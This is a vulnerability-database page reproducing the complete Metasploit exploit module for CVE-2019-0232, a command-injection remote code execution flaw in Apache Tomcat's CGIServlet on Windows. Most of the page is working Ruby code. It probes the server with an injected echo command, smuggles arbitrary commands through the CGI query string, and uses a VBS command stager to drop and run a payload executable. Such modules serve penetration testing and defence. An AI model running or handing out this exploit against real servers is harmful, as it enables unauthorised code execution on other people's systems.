Apache Tomcat - CGIServlet enableCmdLineArguments Remote Code Execution (Metasploit)

🗓️ 03 Jul 2019 00:00:00Reported by MetasploitType

exploitdb🔗 www.exploit-db.com👁 1115 Views

Vulnerability in Apache Tomcat's CGIServlet component allows remote code execution when enableCmdLineArguments is set to true

Reporter	Title	Published	Views	Family All 67
0day.today	Apache Tomcat CGIServlet enableCmdLineArguments Remote Code Execution Exploit	2 Jul 201900:00	–	zdt
IBM Security Bulletins	Security Bulletin: Open Source Apache Tomcat vulnerabilities affect IBM Tivoli Application Dependency Discovery Manager (TADDM) (CVE-2019-0232, CVE-2019-0221)	13 Jan 202012:45	–	ibm
IBM Security Bulletins	Security Bulletin: Resilient is vulnerable to Using Components with Known Vulnerabilities	19 Apr 202121:45	–	ibm
IBM Security Bulletins	Security Bulletin: Security vulnerability has been identified in Jazz Team Server shipped with Jazz Reporting Service (CVE-2019-0232)	29 Apr 201919:25	–	ibm
IBM Security Bulletins	Security Bulletin: Multiple Vulnerabilities in IBM Guardium Data Encryption (GDE)	24 Aug 202010:03	–	ibm
IBM Security Bulletins	Security Bulletin: Security vulnerability in Apache Tomcat affects multiple IBM Rational products based on IBM's Jazz technology	28 Apr 202118:35	–	ibm
GithubExploit	Exploit for OS Command Injection in Apache Tomcat	25 Mar 202120:09	–	githubexploit
GithubExploit	Exploit for OS Command Injection in Apache Tomcat	16 Apr 201914:32	–	githubexploit
GithubExploit	Exploit for OS Command Injection in Apache Tomcat	19 Mar 202618:23	–	githubexploit
GithubExploit	Exploit for OS Command Injection in Apache Tomcat	21 Nov 201914:25	–	githubexploit

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager

  def initialize(info={})
    super(update_info(info,
      'Name'            => 'Apache Tomcat CGIServlet enableCmdLineArguments Vulnerability',
      'Description'     => %q{
        This module exploits a vulnerability in Apache Tomcat's CGIServlet component. When the
        enableCmdLineArguments setting is set to true, a remote user can abuse this to execute
        system commands, and gain remote code execution.
      },
      'License'         => MSF_LICENSE,
      'Author'          =>
        [
          'Yakov Shafranovich', # Original discovery
          'sinn3r'              # Metasploit module
        ],
      'Platform'        => 'win',
      'Arch'            => [ARCH_X86, ARCH_X64],
      'Targets'         =>
        [
          [ 'Apache Tomcat 9.0 or prior for Windows', { } ]
        ],
      'References'      =>
        [
          ['CVE', '2019-0232'],
          ['URL', 'https://wwws.nightwatchcybersecurity.com/2019/04/30/remote-code-execution-rce-in-cgi-servlet-apache-tomcat-on-windows-cve-2019-0232/'],
          ['URL', 'https://blog.trendmicro.com/trendlabs-security-intelligence/uncovering-cve-2019-0232-a-remote-code-execution-vulnerability-in-apache-tomcat/']
        ],
      'Notes'           =>
        {
          'SideEffects' => [ IOC_IN_LOGS, ARTIFACTS_ON_DISK ],
          'Reliability' => [ REPEATABLE_SESSION ],
          'Stability'   => [ CRASH_SAFE ]
        },
      'CmdStagerFlavor' => 'vbs',
      'DefaultOptions'  =>
        {
          'RPORT' => 8080
        },
      'Privileged'      => false,
      'DisclosureDate'  => 'Apr 10 2019', # Date of public advisory issued by the vendor
      'DefaultTarget'   => 0
      ))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The URI path to CGI script', '/'])
      ])

    register_advanced_options(
      [
        OptBool.new('ForceExploit', [false, 'Override check result', false])
      ])

    deregister_options('SRVHOST', 'SRVPORT', 'URIPATH')
  end

  def check
    sig = Rex::Text.rand_text_alpha(10)
    uri = normalize_uri(target_uri.path)
    uri << "?&echo+#{sig}"

    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => uri
    })

    unless res
      vprint_error('No Response from server')
      return CheckCode::Unknown
    end

    if res.body.include?(sig)
      return CheckCode::Vulnerable
    end

    CheckCode::Safe
  end

  def execute_command(cmd, opts={})
    # Our command stager assumes we have access to environment variables.
    # We don't necessarily have that, so we have to modify cscript to a full path.
    cmd.gsub!('cscript', 'C:\\Windows\\System32\\cscript.exe')

    uri = normalize_uri(target_uri.path)
    uri << "?&#{CGI.escape(cmd)}"

    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => uri
    })

    unless res
      fail_with(Failure::Unreachable, 'No response from server')
    end

    unless res.code == 200
      fail_with(Failure::Unknown, "Unexpected server response: #{res.code}")
    end
  end

  # it seems we don't really have a way to retrieve the filenames from the VBS command stager,
  # so we need to rely on the user to cleanup the files.
  def on_new_session(cli)
    print_warning('Make sure to manually cleanup the exe generated by the exploit')
    super
  end

  def exploit
    print_status("Checking if #{rhost} is vulnerable")
    unless check == CheckCode::Vulnerable
      unless datastore['ForceExploit']
        fail_with(Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.')
      end

      print_warning('Target does not appear to be vulnerable.')
    end

    print_status("#{rhost} seems vulnerable, what a good day.")
    execute_cmdstager(flavor: :vbs, temp: '.', linemax: 7000)
  end
end

03 Jul 2019 00:00Current

7.1High risk

Vulners AI Score7.1

CVSS 38.1

CVSS 29.3

EPSS0.94221